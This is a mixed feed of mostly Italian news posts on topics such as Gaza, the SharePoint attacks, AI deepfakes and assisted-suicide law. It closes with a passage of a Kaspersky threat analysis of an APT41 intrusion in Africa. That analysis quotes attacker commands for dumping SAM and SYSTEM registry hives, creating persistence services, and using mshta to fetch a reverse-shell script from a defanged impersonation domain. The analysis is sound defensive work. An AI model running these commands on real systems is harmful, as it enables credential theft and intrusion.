POuL - Visita al data center Seeweb: un’esperienza formativa tra infrastrutture all’avanguardia e cultura della rete
poul.org/2025/07/seeweb-visita…
Segnalato da Linux Italia e pubblicato sulla comunità Lemmy @GNU/Linux Italia
Il 7 maggio 2025, il POuL ha avuto il privilegio di visitare il data center Seeweb di Milano, un punto di riferimento per l’innovazione e
GNU/Linux Italia reshared this.
GAZA. L’esercito israeliano attacca in massa Deir al Balah. Migliaia di civili in fuga
@Notizie dall'Italia e dal mondo
L'estensione dell'offensiva "Carri di Gedeone" porta morte e distruzione nell'area di Gaza colpita relativamente di meno dopo il 7 ottobre 2023
L'articolo GAZA. L’esercito israeliano attacca in massa Deir al Balah. Migliaia di civili in
Notizie dall'Italia e dal mondo reshared this.
Microsoft, migliaia di server SharePoint violati in tutto il mondo. Anche in Italia? ACN: “Gravità 9.8”
@Informatica (Italy e non Italy 😁)
Il Governo degli Stati Uniti, insieme ai partner in Canada e Australia, sta indagando sul grave attacco informatico che ha colpito agenzie governative e aziende a livello globale, sfruttando una vulnerabilità critica nei server
reshared this
Ma si Vola! Trump pubblica DeepFake dell’arresto di Obama e ovviamente scoppia polemica
Pensavamo che dopo il deepfake di Donald Trump Papa non ci avrebbe più stupito nulla, ma oggi dobbiamo ricrederci davanti a un nuovo, spumeggiante deepfake pubblicato dallo stesso Trump sul suo social network.
Il presidente degli Stati Uniti Donald Trump ha nuovamente acceso lo scontro politico pubblicando su Truth Social un video generato dall’intelligenza artificiale che ritrae una scena decisamente provocatoria: l’arresto dell’ex presidente Barack Obama da parte di due agenti dell’FBI, proprio nello Studio Ovale.
Un’immagine che ha rapidamente fatto il giro dei social, alimentando tensioni già elevate tra democratici e repubblicani. Il filmato inizia con una sequenza in cui Obama pronuncia la frase “il Presidente è al di sopra della legge”, seguita da una serie di dichiarazioni di noti esponenti democratici, tra cui Nancy Pelosi, che ripetono il concetto “Nessuno è al di sopra della legge”.
La scena culmina con l’arresto simulato di Obama, mentre Trump, sorridente, osserva accanto. Il tutto è accompagnato dalle note di YMCA dei Village People, scelta musicale che aggiunge un tono surreale e quasi grottesco alla ricostruzione.
youtube.com/embed/JnPm_vgZPiE?…
La clip, chiaramente costruita con tecniche avanzate di intelligenza artificiale, ha sollevato preoccupazioni trasversali sul potere dei deepfake nel plasmare l’opinione pubblica, specialmente in un contesto già polarizzato come quello statunitense. Molti critici hanno sottolineato il rischio di diffondere contenuti manipolati che possono essere percepiti come reali da una parte dell’elettorato meno attento o più radicalizzato.
Oltre alle accuse di strumentalizzazione politica, il video ha riacceso il dibattito su responsabilità, etica e limiti nell’uso dell’intelligenza artificiale, soprattutto quando impiegata da figure pubbliche di grande rilevanza. In molti si chiedono se il confine tra satira politica e disinformazione non stia diventando sempre più sottile, con conseguenze potenzialmente gravi per la democrazia.
Nonostante le polemiche, il filmato ha ottenuto moltissime visualizzazioni dimostrando ancora una volta come i contenuti virali – anche se controversi – siano uno strumento potentissimo nella battaglia politica contemporanea. Nel frattempo, il dibattito negli Stati Uniti resta acceso: l’AI è un semplice mezzo di provocazione o una minaccia concreta alla verità?
L'articolo Ma si Vola! Trump pubblica DeepFake dell’arresto di Obama e ovviamente scoppia polemica proviene da il blog della sicurezza informatica.
Cavi Sottomarini sotto la lente della FCC. Nuove misure per proteggere Internet da attori ostili
La Federal Communications Commission (FCC) degli Stati Uniti ha proposto misure più stringenti per proteggere i cavi sottomarini che svolgono un ruolo chiave nel funzionamento di Internet e dei sistemi finanziari. Secondo l’agenzia, l’iniziativa mira a stimolare gli investimenti nelle infrastrutture e ad accelerare lo sviluppo di tecnologie di intelligenza artificiale, riducendo al contempo i rischi derivanti da stati ostili, tra cui la Cina.
Se le proposte venissero approvate, gli Stati Uniti introdurrebbero norme più severe per le aziende che operano nel settore dei cavi sottomarini. Le richieste di licenza presentate da entità affiliate a stati ostili verrebbero automaticamente respinte. Si prevede inoltre di introdurre requisiti obbligatori per la sicurezza fisica e informatica delle infrastrutture, e il leasing di cavi per tali entità potrebbe essere completamente vietato.
Allo stesso tempo, il progetto menziona il divieto di utilizzare determinate “apparecchiature pericolose” come parte dell’infrastruttura via cavo, sebbene il documento non fornisca una definizione specifica di questo termine.
L’iniziativa riflette le crescenti preoccupazioni sulla vulnerabilità delle comunicazioni sottomarine. Questi cavi trasportano circa il 99% del traffico internet mondiale e gestiscono transazioni finanziarie per un valore di 10.000 miliardi di dollari al giorno. La tecnologia satellitare non è ancora in grado di gestire questo carico. Il presidente della FCC, Brendan Carr, ha definito i cavi sottomarini gli eroi non celebrati delle comunicazioni globali.
Gli Stati Uniti hanno già adottato misure simili in passato, lanciando un massiccio programma nel 2020 per smantellare le apparecchiature Huawei e ZTE degli operatori di telecomunicazioni rurali e ripulire le loro infrastrutture dalla tecnologia cinese. Carr afferma che lo sviluppo di data center e infrastrutture di nuova generazione è impossibile senza cavi sottomarini affidabili e che la sicurezza economica è direttamente collegata alla sicurezza nazionale.
Ha inoltre osservato che negli ultimi anni le infrastrutture via cavo sottomarino sono state ripetutamente minacciate da potenze straniere. Pertanto, gli Stati Uniti intendono adottare ulteriori misure per prevenire il controllo ostile, nonché attacchi informatici e sabotaggi fisici.
L'articolo Cavi Sottomarini sotto la lente della FCC. Nuove misure per proteggere Internet da attori ostili proviene da il blog della sicurezza informatica.
Gazzetta del Cadavere reshared this.
Wikipedia: Warum das Ehrenamt zählt und bezahltes Schreiben trotzdem sinnvoll ist
Modelli AI di uso generale: ecco le linee guida della Commissione UE per i provider
@Informatica (Italy e non Italy 😁)
La Commissione europea ha pubblicato le linee guida per assistere i fornitori di modelli di intelligenza artificiale per finalità generali, in vista del prossimo 2 agosto 2025 quando saranno pienamente applicabili le norme dell’AI Act sui
Informatica (Italy e non Italy 😁) reshared this.
Attacco globale a Sharepoint di Microsoft: come mitigare il rischio di ToolShell anche in Italia
@Informatica (Italy e non Italy 😁)
Agenzie federali e statali statunitensi, università, aziende energetiche e una Tlc asiatica sono fra le vittime del grave. Ecco come proteggere i server Sharepoint on-premises di Microsoft che in Italia sono ovunque
Informatica (Italy e non Italy 😁) reshared this.
Siamo entrati nel degrado più totale. Paese fallito in tutto, a livello morale, politico, civile, culturale ed educativo.
Annullato concerto del direttore d’orchestra russo nella Reggia di Caserta – Imola Oggi
imolaoggi.it/2025/07/21/annull…
#EXPO2025 Osaka, alcuni scatti della visita del Ministro Giuseppe Valditara a “#ScuolaFutura Italia Osaka 2025” dove ha incontrato le tante #scuole italiane presenti.
Qui l’album ▶️flic.kr/s/aHBqjCngoC
Ministero dell'Istruzione
#EXPO2025 Osaka, alcuni scatti della visita del Ministro Giuseppe Valditara a “#ScuolaFutura Italia Osaka 2025” dove ha incontrato le tante #scuole italiane presenti. Qui l’album ▶️https://flic.kr/s/aHBqjCngoCTelegram
The end of online anonymity
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and I'm slightly regretting taking my summer vacation early now that a lot of you are downing tools for a well-deserved break. Think of me as you all catch up on your summer reading by the beach.
— A new generation of 'age verification' rules aimed at protecting kidsis breaking the long-standing principle that everyone is anonymous online.
— What to expect from the White House's upcoming AI Action plan to be announced on July 23 that will lay out the US federal government's thinking.
— The European Union's next seven-year budget will likely earmark billions of dollars for next-generation technologies and digital rulemaking.
Let's get started:
Bearing Witness: Measuring the Wobbles in Rotary Build
3D printing has simplified the creation of many things, but part of making something is knowing just how much you can rely on it. On the [BubsBuilds] YouTube channel, he built a cheap rotary table and then walked through the process of measuring the error inherent in any rotating system.
Starting with a commercial rotary table, [BubsBuilds] decided he wanted a rotary stage that was both lighter and had provisions for motorized movement. Most of the rotary build is 3D printed, with the large housing and table made from PETG, and the geared hub and worm gear printed on a resin printer. The bearings used to support the worm gear are common skateboard bearings. There is also a commercial thrust bearing and 49 larger 9.5mm ball bearings supporting the rotating tabletop.
More after the break…
There are three different types of runout to be measured on a rotating stage: axial, radial, and angular. Axial runout is fairly straightforward to discern by measuring the vertical variation of the table as it rotates. Radial runout measures how true the rotation is around the center of the table. Angular runout measures how level the table stays throughout its range. Since these two runouts are tied to each other, [BubsBuilds] showed how you can take measurements at two different heights and use trigonometry to obtain both your radial and angular runout. This is a great walkthrough of how to approach measuring and characterizing a system that has multiple variables at play. Be sure to check out some of the other cool rotary tables we’ve featured.
youtube.com/embed/No_XLqeN2oE?…
Perché il software libero è un atto politico
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
L'intervento di Giordano Alborghetti.
reshared this
Server Microsoft flop, tutti i dettagli sull’attacco hacker
@Informatica (Italy e non Italy 😁)
Ieri Microsoft ha dichiarato che erano in corso "attacchi attivi" al suo software server utilizzato da agenzie governative e aziende. Hacker non identificati hanno sfruttato una "vulnerabilità significativa" in SharePoint, software per la condivisione e gestione di documenti di Microsoft,
reshared this
Fonti mediche, 19 palestinesi morti di fame in 24 ore - Ultima ora - Ansa.it
Almeno 19 palestinesi, inclusa una bambina di quattro anni, sono morti di fame nelle ultime 24 ore a Gaza: lo riportano la Bbc e la Cnn, che citano il portavoce dell'ospedale dei Martiri di al-Aqsa, a Deir al-Balah, nella Striscia di Gaza centrale.Agenzia ANSA
freezonemagazine.com/articoli/…
La carriera di un musicista può essere un lungo percorso fatto di ricerca, costanza, fatica, migliaia di chilometri fatti per compensi che quasi mai coprono i costi reali. Ci vuole, diciamolo chiaramente, una grande volontà di restare in quella categoria di “never surrender” che ti fa guadagnare stima e rispetto di ascoltatori, fans, amici. Black […]
L'articolo SirJoe Polito – Black & White provie
Scommettete che diranno che sono stati i russi?
Maxi attacco hacker a SharePoint Server: colpite agenzie governative e aziende
Un gruppo di hacker ha sfruttato una vulnerabilità nel software SharePoint Server di Microsoft per lanciare un attacco globale, colpendo agenzie governative statunitensi, università, aziende energetiche e un gruppo di comunicazione asiatico. L’attacco ha interessato installazioni locali del software, non la versione cloud SharePoint Online. Microsoft ha rilasciato un aggiornamento urgente e lavora a ulteriori correzioni. Le autorità di USA, Canada e Australia indagano, con migliaia di server ancora a rischio. L’origine e gli obiettivi del gruppo restano ignoti. Eye Security ha rilevato oltre 50 violazioni, ma i nomi delle vittime sono coperti da accordi di riservatezza.
In Valle d’Aosta comincia domani la discussione su “Liberi Subito”
Entra ufficialmente nel calendario dei lavori del Consiglio regionale della Valle d’Aosta la proposta di legge regionale “Liberi Subito”, volta a garantire tempi e procedure certe per l’accesso al suicidio medicalmente assistito, nel rispetto dei principi indicati dalla sentenza 242/2019 della Corte costituzionale.
La discussione della proposta figura infatti nel calendario del Consiglio regionale per i lavori dal 22 al 24 luglio, come punto 12 dell’ordine del giorno e confidiamo che il Consiglio affronti il tema con serietà e responsabilità verso i propri cittadini come già fatto dalla Regione Toscana.
Il testo della proposta, depositato nel febbraio 2024 dalle consigliere regionali di opposizione Erika Guichardaz e Chiara Minelli, ha iniziato l’iter di discussione il 3 luglio dello scorso anno. L’approvazione del testo rappresenterebbe un primo passo per regolamentare, nel rispetto dei principi costituzionali e delle competenze regionali, l’accesso al suicidio medicalmente assistito per le persone che si trovano nelle condizioni definite dalla sentenza 242/2019: persone maggiorenni, capaci di autodeterminarsi, affetti da patologie irreversibili e fonte di sofferenze fisiche o psicologiche intollerabili, tenuti in vita da trattamenti di sostegno vitale.
“A quasi sei anni dalla sentenza 242 – dichiara Marco Cappato – non possiamo accettare che i cittadini debbano ancora affrontare ostacoli, attese e arbitri, pur avendo diritto ad accedere legalmente al suicidio assistito. La proposta “Liberi Subito” si muove nel solco tracciato dalla Corte costituzionale nel rispetto delle competenze regionali. Non introduce quindi un nuovo diritto, ma si limita a regolamentare le procedure sanitarie di accertamento delle condizioni di salute della persona che fa richiesta di accesso alla pratica. Auspichiamo che il Consiglio regionale della Valle d’Aosta, al di là delle appartenenze politiche, dia prova di responsabilità e rispetto per la volontà delle persone malate”.
— Approfondimento: le Regioni coinvolte dalle Proposte di legge sul Fine vita —
La sentenza 242/2019 della Corte costituzionale sul caso Cappato/Antoniani, garantisce l’accesso all’aiuto alla morte volontaria, il cosiddetto “suicidio assistito” nel nostro Paese, individuando determinate condizioni per la persona malata che ne faccia richiesta che devono essere verificate dal Servizio Sanitario Nazionale.
Il Servizio Sanitario però non garantisce tempi certi per effettuare le verifiche e rispondere alle persone malate che hanno diritto di porre fine alla propria vita. Per questo motivo, nel rispetto delle competenze regionali, l’Associazione Luca Coscioni ha promosso a livello nazionale la campagna “Liberi Subito” con raccolta firme per proposte di legge regionali che garantiscano il percorso di richiesta di suicidio medicalmente assistito e i controlli necessari in tempi certi, adeguati e definiti.
Per conoscere lo stato dell’arte delle singole iniziative CLICCA QUI
L'articolo In Valle d’Aosta comincia domani la discussione su “Liberi Subito” proviene da Associazione Luca Coscioni.
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
🔶 #Valditara: "Assumeremo oltre 54 mila #docenti per il prossimo anno scolastico".
Ministero dell'Istruzione
#NotiziePerLaScuola È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito. 🔶 #Valditara: "Assumeremo oltre 54 mila #docenti per il prossimo anno scolastico".Telegram
OT Cybersecurity: non solo una questione di Direttive e di Regolamenti
A cura di Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy
Oggigiorno è sempre più evidente come le infrastrutture Operational Technology (OT), conseguentemente alla convergenza tra IT e OT e alla loro maggiore complessità, siano in misura crescente esposte a nuovi rischi. Questo porta ad un aumento esponenziale della superficie d’attacco che non guarda più a IT e OT come due mondi separati, ma come un unico singolo bersaglio, aprendo la strada a nuove minacce e vulnerabilità volte a colpire le infrastrutture critiche oltre che il cuore delle realtà industriali, la produzione.
Lo scenario descritto è ulteriormente evidenziato dai dati indicati dal rapporto Clusit 2025, dove il settore manifatturiero ha superato, in termini di attacchi a livello globale, il settore finanziario. Se consideriamo che le infrastrutture OT, per loro stessa natura, sono basate su tecnologie che non possiedono una “security-by-design”, tipicamente obsolete e con poche patch di sicurezza applicate durante il loro prolungato ciclo di vita, si evince come questo contesto sia estremamente critico per la corretta operatività delle organizzazioni che se ne avvalgono.
Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy
Vista la complessità, da dove si può iniziare? Ponendosi domande concrete su come funziona l’infrastruttura e quali metriche adottare per proteggerla. Analizzando i rischi annessi, si possono individuare le aree che richiedono un intervento più rapido. Tipicamente si parte da alcune domande basilari:
- Come sono interconnesse le macchine di produzione o gli impianti?
- Come sono gestite le reti interne degli impianti produzione?
- Quali dispositivi sono presenti all’interno delle reti OT?
- Hanno delle vulnerabilità conosciute?
- Come sono tracciati gli accessi interni ed esterni alle infrastrutture OT?
In questo contesto diventa fondamentale che le aziende affrontino le sfide della sicurezza OT con un approccio basato su standard internazionali e best practice come NIST o ISA/IEC 62443, mettendo in atto:
Visibilità e controllo delle risorse OT: Grazie all’utilizzo di FortiGate Rugged NGFW e servizi dedicati come FortiGuard OT Security Service, ci avvaliamo di 3.300 regole legate a protocolli OT e 750 regole IPS specifiche per ambienti OT, che consentono di mappare in tempo reale l’infrastruttura OT. Il servizio distingue dispositivi legittimi da quelli non autorizzati, offrendo anche oltre 1.500 regole di virtual patching per la protezione dei sistemi legacy da attacchi già riconosciuti e classificati, intercettando e bloccando exploit noti (KEV – Known Exploited Vulnerabilities) prima che raggiungano i dispositivi vulnerabili, proteggendo efficacemente anche i sistemi OT non aggiornabili.
Segmentazione e contenimento: Per ridurre il rischio di intrusioni è richiesto un ambiente OT con controlli di accesso rigorosi tramite policy di rete in tutti i punti di accesso; questo approccio inizia con la creazione di zone e conduits di rete, attuabili con FortiGate Rugged NGFW per il traffico di rete verticale, e ulteriormente ampliabile con FortiSwitch Rugged, consentendo una segmentazione di rete avanzata a livello di porta. Questi switch “rugged”, integrati nativamente con FortiOS, permettono di isolare logicamente linee produttive, accessi remoti e reti IT/OT, contrastando movimenti laterali non autorizzati e semplificando la gestione della sicurezza.
Accesso da remoto sicuro: Permettere a operatori remoti di accedere alle reti OT può essere estremamente vantaggioso in termini di riduzione dei tempi di fermo e rapidità d’intervento, bisogna però implementare soluzioni di accesso da remoto che abbiano funzioni di sicurezza integrate: FortiPAM, FortiSRA (ora aggiornato con nuove funzionalità di gestione delle credenziali e dei segreti per ambienti OT), insieme a FortiClient e FortiToken, integrabili grazie alla Fortinet Security Fabric, ci aiutano a mettere le basi per un accesso remoto protetto, controllato e tracciabile anche in scenari distribuiti o estremamente sensibili.
Integrazione e orchestrazione: La Fortinet OT Security Platform si integra nella Fortinet Security Fabric per consentire facilmente la convergenza e la connettività delle IT/OT. Questo aiuta ad aumentare la visibilità e la risposta in tempo reale sull’intera superficie di attacco e consente ai team Security Operations Center (SOC) di diventare più efficienti ed efficaci nei tempi di risposta in fabbriche, impianti, sedi remote.
Una best practice che ha effetti positivi: il rapporto Fortinet
Il Global 2025 State of Operational Technology and Cybersecurity Report di Fortinet evidenzia una riduzione rilevante del numero di vendor di dispositivi OT, indicatore di maggiore maturità ed efficienza operativa. Oggi, il 78% delle organizzazioni utilizza solo da uno a quattro fornitori OT, a dimostrazione di un processo di consolidamento.
Il consolidamento dei vendor di cybersecurity è sintomo di maturità, coerente con quanto osservato tra i clienti Fortinet che adottano la piattaforma Fortinet OT Security. L’unificazione di rete e sicurezza nei siti OT remoti ha migliorato la visibilità e ridotto i rischi cyber, portando a una riduzione del 93% degli incidenti rispetto a una rete piatta. Le soluzioni semplificate di Fortinet, inoltre, hanno consentito un miglioramento delle performance pari a 7 volte, grazie alla riduzione dei tempi di triage e configurazione.
È fondamentale proseguire in questa direzione: la protezione degli ambienti industriali non è più una questione tecnica, ma un tema di business continuity, reputazione e competitività.
Per saperne di più sullo stato della sicurezza OT nel 2025, leggi il rapporto completo di Fortinet.
L'articolo OT Cybersecurity: non solo una questione di Direttive e di Regolamenti proviene da il blog della sicurezza informatica.
Il Codice di Camaldoli, dalla newsletter "La buona storia" di Andrea Bosio
L’incontro di un gruppo di intellettuali dell’area cattolica, estranei al fascismo, si svolse nel monastero di Camaldoli (Ar) dal 18 al 24 luglio.
La riunione, presentata come una delle molte “settimane teologiche”, era stata organizzata da un gruppo di laici impegnati nel settore economico, in particolare Sergio Paronetto e Pasquale Saraceno, coordinati da Adriano Bernareggi, vescovo di Bergamo.
Il dibattito avrebbe portato, nel giro di due anni, alla stesura di un documento: "Per la comunità cristiana. Principi dell’ordinamento sociale, a cura di un gruppo di studiosi amici di Camaldoli".
Con questo titolo raggiunse le stampe nell’aprile del 1945 il testo che oggi è ricordato come "Codice di Camaldoli".
#5 - Il Codice di Camaldoli
Quando un pezzo di Costituzione fu scritto in un monastero durante la guerraAndrea Bosio (La buona storia)
Storia reshared this.
Governance, Risk & Compliance (GRC): ecco le principali certificazioni professionali
@Informatica (Italy e non Italy 😁)
La mappa delle principali certificazioni professionali in ambito Governance, Risk & Compliance (GRC). Le credenziali più accreditate, nel contesto del framework ECSF di Enisa e della nuova Direttiva NIS2, aiutano i professionisti
Informatica (Italy e non Italy 😁) reshared this.
RISERVA MA NON PER HOBBY E QUANDO?
@Informatica (Italy e non Italy 😁)
Non è cosa da affrontare “in maniera hobbistica” l’istituzione di una Riserva ausiliaria militare dello Stato...
L'articolo RISERVA MA NON PER HOBBY E QUANDO? proviene da GIANO NEWS.
#DIFESA
Informatica (Italy e non Italy 😁) reshared this.
Rumble in the jungle: APT41’s new target in Africa
Introduction
Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.
During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.
Incident investigation and toolkit analysis
Detection
Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:
- A process chain of svchost.exe ➔exe ➔ cmd.exe
- The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:
The attackers also leveraged the Atexec module from the Impacket toolkit.
Scheduler tasks created by Atexec
The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.
The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.
After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.
Privilege escalation and lateral movement
After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:
cmd.exe /c netstat -ano > C:\Windows\temp\temp_log.log
cmd.exe /c tasklist /v > C:\Windows\temp\temp_log.log
They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.
Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.
cmd.exe /c reg save HKLM\SAM C:\Windows\temp\temp_3.log
cmd.exe /c reg save HKLM\SYSTEM C:\Windows\temp\temp_4.log
On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.
In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.
In most cases, the attackers placed their malicious tools in the C:\WINDOWS\TASKS\ directory on target hosts, but they used other paths too:
c:\windows\tasks\
c:\programdata\
c:\programdata\usoshared\
c:\users\public\downloads\
c:\users\public\
c:\windows\help\help\
c:\users\public\videos\
Files from these directories were then executed remotely using the WMI toolkit:
Lateral movement via privileged accounts
C2 communication
Cobalt Strike
The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.
Here’s a general overview of how Cobalt Strike was launched:
Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:
C:\Users\Public\
C:\Users\{redacted}\Downloads\
C:\Windows\Tasks\
The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.
During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:
Legitimate file name | DLL | Encrypted Cobalt Strike |
TmPfw.exe | TmDbg64.dll | TmPfw.ini |
cookie_exporter.exe | msedge.dll | Logs.txt |
FixSfp64.exe | log.dll | Logs.txt |
360DeskAna64.exe | WTSAPI32.dll | config.ini |
KcInst.exe | KcInst32.dll | kcinst.log |
MpCmdRunq.exe | mpclient.dll | Logs.txt |
Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.
The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.
When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:
- Japanese (Japan)
- Korean (South Korea)
- Chinese (Mainland China)
- Chinese (Taiwan)
If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.
The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.
The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.
The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:
Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.
Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.
Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:
C:\Windows\system32\cmd.exe /C sc create "server power" binpath= "cmd /c start C:\Windows\tasks\Edge.exe" && sc description "server power" "description" && sc config "server power" start= auto && net start "server power"
Attackers often use the following service names for embedding Cobalt Strike:
server power
WindowsUpdats
7-zip Update
Agent
During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:
The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.
While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.
The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.
It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:
Obtaining a command shell: reverse shell via an HTA file
If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:
"cmd.exe" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.
At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.
The harmless script found on github[.]githubassets[.]net
However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.
Once launched, the script gathers initial host information:
It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.
Data collection
Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.
Pillager
A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.
The primary types of data collected by this utility include:
- Saved credentials from browsers, databases, and administrative utilities like MobaXterm
- Project source code
- Screenshots
- Active chat sessions and data
- Email messages
- Active SSH and FTP sessions
- A list of software installed on the host
- Output of the systeminfo and tasklist commands
- Credentials stored and used by the operating system, and Wi-Fi network credentials
- Account information from chat apps, email clients, and other software
A sample of data collected by Pillager:
The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.
Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:\Windows\Temp\Pillager.zip.
It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.
Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:
Checkout
The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.
When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.
Data collection and archiving in Checkout
Checkout launch diagram in Kaspersky Threat Intelligence Platform
RawCopy
Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.
RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.
The following commands were used to collect registry files:
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\system /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\sam /OutputPath:c:\users\public\downloads
